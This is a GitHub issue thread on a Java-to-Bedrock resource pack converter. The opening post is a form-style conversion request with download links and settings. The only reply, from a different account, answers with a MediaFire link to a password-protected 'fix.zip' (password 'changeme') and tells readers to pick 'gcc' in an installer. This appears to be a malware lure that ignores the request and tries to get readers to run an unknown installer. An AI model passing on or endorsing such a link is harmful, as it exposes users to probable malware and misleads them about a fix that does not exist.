### ISSUE TITLE
mergepick

### ISSUE THREAD

**Issue by Quoats** [Kas-tle/java2bedrock.sh#33492]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/5d53ygonvr86vups5fzia/merged.zip?rlkey=0yjqebc8ja68j3q226bwes5pn&st=j54riyig&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/h2vrz8gyeutmhtxap8hz5/dkeinc.zip?rlkey=x58jvg9v1psktviloe5lb3goh&st=0p1yew4b&dl=1

### Default Assets Version

None

### Block Material

alpha_test

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

true

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
